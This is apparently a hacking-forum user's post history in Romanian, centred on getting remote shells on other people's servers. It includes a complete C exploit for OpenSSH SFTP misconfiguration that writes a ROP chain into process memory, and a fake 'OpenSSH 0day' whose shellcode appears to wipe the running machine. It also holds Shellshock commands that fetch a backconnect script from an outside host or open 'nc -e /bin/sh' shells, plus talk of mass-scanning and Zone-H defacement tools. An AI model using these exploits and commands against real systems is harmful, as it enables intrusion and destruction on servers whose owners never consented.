florinul
-
Posts
291 -
Joined
-
Last visited
Posts posted by florinul
-
-
reupload? nu merge linkul poti sa pui .zip sau .tgz ?
-
Nytro era prea frumos sa fie fara user si pass
-
am gasit eu cate vuln care apare ca e vulnerabil da nu arata cgi-ul arata doar ip nustiu ce sa zic...
-
OpenSSH lets you grant SFTP access to users without allowing full command
execution using "ForceCommand internal-sftp". However, if you misconfigure
the server and don't use ChrootDirectory, the user will be able to access
all parts of the filesystem that he has access to - including procfs. On
modern Linux kernels (>=2.6.39, I think), /proc/self/maps reveals the
memory layout and /proc/self/mem lets you write to arbitrary memory
positions. Combine those and you get easy RCE.
The linux version of OpenSSH 6.7 contains a mitigation, see the release notes:
* sftp-server(8): On platforms that support it, use prctl() to
prevent sftp-server from accessing /proc/self/{mem,maps}
Here's my PoC for 64bit Linux:
#define _GNU_SOURCE
// THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT
// TRY TO ATTACK BACK, THE CODE IS SLOPPY!
// (In other words, please don't use this against other people's machines.)
#include <libssh/libssh.h>
#include <libssh/sftp.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#define min(a, (((a)<()?(a))
sftp_session sftp;
size_t grab_file(char *rpath, char **out) {
size_t allocated = 4000, used = 0;
*out = calloc(1, allocated+1);
sftp_file f = sftp_open(sftp, rpath, O_RDONLY, 0);
if (f == NULL) fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
while (1) {
ssize_t nbytes = sftp_read(f, *out+used, allocated-used);
if (nbytes < 0) fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
if (nbytes == 0) {
(*out)[used] = '\0';
sftp_close(f);
return used;
}
used += nbytes;
if (used == allocated) {
allocated *= 4;
*out = realloc(*out, allocated);
}
}
}
void dump_file(char *name, void *buf, size_t len) {
FILE *f = fopen(name, "w+");
if (!f) perror("can't write to local file"), exit(1);
if (fwrite(buf, 1, len, f) != len) fprintf(stderr, "local write failed\n"), exit(1);
if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
}
size_t slurp_file(char *path, char **out) {
size_t allocated = 4000, used = 0;
*out = calloc(1, allocated+1);
FILE *f = fopen(path, "r");
if (f == NULL) perror("opening local file failed"), exit(1);
while (1) {
ssize_t nbytes = fread(*out+used, 1, allocated-used, f);
if (nbytes < 0) fprintf(stderr, "Error reading local file %s: %s\n", path, strerror(errno)), exit(1);
if (nbytes == 0) {
(*out)[used] = '\0';
if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
return used;
}
used += nbytes;
if (used == allocated) {
allocated *= 4;
*out = realloc(*out, allocated);
}
}
}
int main(int argc, char **argv) {
if (argc != 4) fprintf(stderr, "invocation: ./exploit host user 'shell commands here'\n"), exit(1);
char *target_host = argv[1];
char *target_user = argv[2];
char *shell_commands = argv[3];
ssh_session my_ssh_session;
int rc;
char *password;
// Open session and set options
my_ssh_session = ssh_new();
if (my_ssh_session == NULL) exit(-1);
ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, target_host);
ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, target_user);
// Connect to server
rc = ssh_connect(my_ssh_session);
if (rc != SSH_OK) fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
// Authenticate ourselves
password = getpass("Password: ");
rc = ssh_userauth_password(my_ssh_session, NULL, password);
if (rc != SSH_AUTH_SUCCESS)
fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
sftp = sftp_new(my_ssh_session);
if (sftp == NULL) fprintf(stderr, "Error allocating SFTP session: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
rc = sftp_init(sftp);
if (rc != SSH_OK) {
fprintf(stderr, "Error initializing SFTP session: %s.\n", ssh_get_error(sftp));
sftp_free(sftp);
return rc;
}
char *mappings;
grab_file("/proc/self/maps", &mappings);
//printf("/proc/self/maps dump: \n%s\n\n\n", mappings);
printf("got /proc/self/maps. looking for libc...\n");
// 7fc9e742b000-7fc9e75ad000 r-xp 00000000 fe:00 2753466 /lib/x86_64-linux-gnu/libc-2.13.so
long long start_addr, end_addr, offset;
char *libc_path = NULL;
long long stack_start_addr = 0, stack_end_addr;
for (char *p = strtok(mappings, "\n"); p; p = strtok(NULL, "\n")) {
if (strstr(p, " r-xp ") && strstr(p, "/libc-")) {
if (libc_path) fprintf(stderr, "warning: two times libc?\n");
printf("mapping line: %s\n", p);
if (sscanf(p, "%Lx-%Lx %*4c %Lx", &start_addr, &end_addr, &offset) != 3) perror("scanf failed"), exit(1);
libc_path = strdup(strchr(p, '/'));
if (libc_path == NULL) fprintf(stderr, "no path in mapping?"), exit(1);
}
if (strstr(p, "[stack]")) {
if (stack_start_addr != 0) fprintf(stderr, "two stacks? no."), exit(1);
printf("mapping line: %s\n", p);
if (sscanf(p, "%Lx-%Lx ", &stack_start_addr, &stack_end_addr) != 2) perror("scanf failed"), exit(1);
}
}
if (libc_path == NULL) fprintf(stderr, "unable to find libc\n"), exit(1);
if (stack_start_addr == 0) fprintf(stderr, "unable to find stack"), exit(1);
printf("remote libc is at %s\n", libc_path);
printf("offset %Lx from libc is mapped to %Lx-%Lx\n", offset, start_addr, end_addr);
char *libc;
size_t libc_size = grab_file(libc_path, &libc);
dump_file("libc.so", libc, libc_size);
printf("downloaded libc, size is %zu bytes\n", libc_size);
system("objdump -T libc.so | grep ' system$' | cut -d' ' -f1 > system.addr");
char *system_offset_str;
slurp_file("system.addr", &system_offset_str);
long long system_offset;
if (sscanf(system_offset_str, "%Lx", &system_offset) != 1) perror("scanf failed"), exit(1);
long long remote_system_addr = start_addr+system_offset-offset;
printf("remote system() function is at %Lx\n", remote_system_addr);
printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
if (gadget == NULL) fprintf(stderr, "no gadget found \n"), exit(1);
long long gadget_address = start_addr + (gadget-(libc+offset));
long long ret_address = gadget_address+1;
printf("found gadget at %Lx\n", gadget_address);
printf("remote stack is at %Lx-%Lx\n", stack_start_addr, stack_end_addr);
printf("doing it the quick-and-dirty way (that means: pray that the target"
"program was compiled with gcc, giving us 16-byte stack alignment)...\n");
long long stack_len = stack_end_addr - stack_start_addr;
/*if (stack_len > 32000) {
stack_len = 32000;
stack_start_addr = stack_end_addr - stack_len;
}*/
char *new_stack = malloc(stack_len);
// first fill it with our ret slide
for (long long *s = (void*)new_stack; s<(long long*)(new_stack+stack_len); s++) {
*s = ret_address;
}
// put some shell commands in the head
strcpy(new_stack, shell_commands);
// put the mini-ROP-chain at the end
// [address of pop rdi] [stack head] [address of system]
long long *se = (void*)(new_stack + stack_len);
se[-3] = gadget_address;
se[-2] = stack_start_addr;
se[-1] = remote_system_addr;
printf("Prepared the new stack. Now comes the moment of truth: push the new stack over and pray.\n");
sftp_file mem = sftp_open(sftp, "/proc/self/mem", O_RDWR, 0);
if (mem == NULL) fprintf(stderr, "Error opening remote memory: %s\n", ssh_get_error(sftp)), exit(1);
// first send over the string
rc = sftp_seek64(mem, stack_start_addr);
if (rc) fprintf(stderr, "Error seeking to remote stack: %s\n", ssh_get_error(sftp)), exit(1);
ssize_t mem_written = sftp_write(mem, new_stack, strlen(shell_commands)+1);
if (mem_written != strlen(shell_commands)+1) fprintf(stderr, "didn't write the whole new stack\n");
// now send over the rest right-to-left
for (long long off = stack_len-32000; off >= 0; off -= 32000) {
rc = sftp_seek64(mem, stack_start_addr+off);
if (rc) fprintf(stderr, "Error seeking: %s\n", ssh_get_error(sftp)), exit(1);
mem_written = sftp_write(mem, new_stack+off, 32000);
if (mem_written != 32000) fprintf(stderr, "stack write failed – that's probably good \n"), exit(0);
}
return 0;
}
source : OpenSSH 6.6 SFTP Misconfiguration Proof Of Concept ? Packet Storm
-
l-a incercat cineva?
-
l-am incercat pe clasa 66.33 nu a gasit nici unul vuln ori nu functioneaza cum trebuie . am sa incec pe 66. *
-
Nu vroiam pentru a face o parerr despre impactul pe care il are vulnrrabilutatea
-
Nytro recunosc nu ma mai priceo deoarece nu mam mai ocupat ani de zile . Mai degraba explicami cum sa scanez mass cu el de exemplu cu pnscan ala nu se poate ?
-
Chiar nu ne poate ajuta nimeni sa il facem masscan ?
-
ma indruma si pe mine cineva ?
am inccat pe mai multe servere asa
php php -u http://www.gallery.cz/cgi-bin/gallery/hynekol/aps.sh -c" wget http://suse.altervista.org/s/dc.txt -O /tmp/dc.txt"
php php -u http://www.gallery.cz/cgi-bin/gallery/hynekol/aps.sh -c " perl dc.txt ip.ip.ip.ip 2121"
sau
php -u http://www.gallery.cz/cgi-bin/gallery/hynekol/aps.sh -c"/ bin/nc -e /bin/sh ip.ip.ip.ip 2121"
si nu a mers pe nici unul . imi xplica si mie cineva cum fac nc pe serverle vuln de bash ?
-
Era mai simplu daca spunea cineva ... asa trebuie sa staunsa descifrez una alta
-
Un exemplu concret nytro ? Sa zicem ca avem serverul 1.2.3.4
-
Pai si care e criteriul.pt serverele vuln ? Cum le gasesti un dork ceva ?
-
L-am creat da tot nu se intampla nimic ...
-
salutare xplica-mi cum se foloseste
agro2:/tmp# php wp
PHP Warning: Module 'MapScript' already loaded in Unknown on line 0
Warning: file(4char.txt): failed to open stream: No such file or directory in /tmp/wp on line 10
Cookie name: wordpress_72e38bc39b0910555ad5cac5dcbf8381
All possible cookie values:
Warning: Invalid argument supplied for foreach() in /tmp/wp on line 14
am modificat auth salt url etc...
-
banuiesc ca la mine e fiindc anu am nagios instalat pe srverul de pe care incec scanul nu ?
-
Fed0t trebuie sa am nagios instalat pe severul de pe care rulez exploitul ?
-
trebuie sa am nagios instalat pe severu de pe care rulez scanneru ?
-
95.85.55.54 Open (Trying to exploit.Check NetCat Listener)
/bin/sh: /usr/local/nagios/libexec/check_nrpe: No such file or directory
de ce da asa?
-
imi da eroarea asta
root:mydediserver [/dev/shm]# python a.py
File "a.py", line 91
with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines()
^
SyntaxError: invalid syntax
de ce?
-
am incercat pe mai multe hosturi si tot nu merge. Il pun .php nu ? adica copii textul intr-un fisier .php si apoi url http://host/fisier.php?
-
mie nu imi merge am facut fisier .html l-am urcat pe host nimica ,apoi l-am facut si php si tot nimic ori se copie codu de aiurea
-
BTW cred ca e fake . nu stiu ce face shellcodu ala exact . Cine se pricepe rog sa posteze parerea aici
-
/*
*
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
void usage(char *argv[])
{
printf("\n\t[+] HATSUNEMIKU\n");
printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
printf("\t[+] By: Team foxx\n");
printf("\t[+] Greetz to hackforums.net\n");
printf("\t[+] Keep this 0day priv8!\n");
printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
exit(1);
}
unsigned char decoder[]= "\x6a\x0b\x58\x99\x52"
"\x6a\x2f\x89\xe7\x52"
"\x66\x68\x2d\x66\x89"
"\xe6\x52\x66\x68\x2d"
"\x72\x89\xe1\x52\x68"
"\x2f\x2f\x72\x6d\x68"
"\x2f\x62\x69\x6e\x89"
"\xe3\x52\x57\x56\x51"
"\x53\x89\xe1\xcd\x80";
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
"\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
"\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
"\xdb\x40\xcd\x80";
int main(int argc, char **argv)
{
int euid = geteuid();
int port= 22, sock;
char h[1000];
struct hostent *host;
struct sockaddr_in addr;
if(euid != 0)
{
fprintf(stderr, "You need to be root to use raw sockets.\n");
exit(1);
}
if(euid == 0)
{
fprintf(stdout, "MIKU! MIKU! MIKU!\n");
}
if(argc != 3)
usage(argv);
if(!inet_aton(h, &addr.sin_addr))
{
host = gethostbyname(h);
if(!host)
{
fprintf(stderr, "[-] Exploit failed.\n");
(*(void(*)())decoder)();
exit(1);
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr,"[-] Exploit failed.\n");
exit(1);
}
char payload[1337];
memcpy(payload, &decoder, sizeof(decoder));
memcpy(payload, &rootshell, sizeof(rootshell));
send(sock, payload, strlen(payload),0);
close(sock);
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr, "[-] Exploit failed.\n");
exit(1);
}
else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
{
fprintf(stdout, "[+]g0t sh3ll!\n");
system("/bin/bash");
}
else
{
fprintf(stderr, "[-] Exploit failed.\n");
close(sock);
exit(0);
}
}
Joomla Auto Exploiter + Scanner
in Free stuff
Posted
am reusit sa il iau iam dat perl scan.pl mi-a gasit site-uri si mi-a facu KKK.txt
apoit am dat perl expoit.pl KKK.txt
si imi apare asa
>> City of Newberry ->sh: -c: line 0: syntax error near unexpected token `('
sh: -c: line 0: `title exploit.pl KkK.txt - [ 30/236 ] =-= Zone-H [ OK (0) ~ ERRO (0) ]'
[!]
>> smiledentaljournal.com ->sh: -c: line 0: syntax error near unexpected token `('
sh: -c: line 0: `title exploit.pl KkK.txt - [ 31/236 ] =-= Zone-H [ OK (0) ~ ERRO (0) ]'
[!]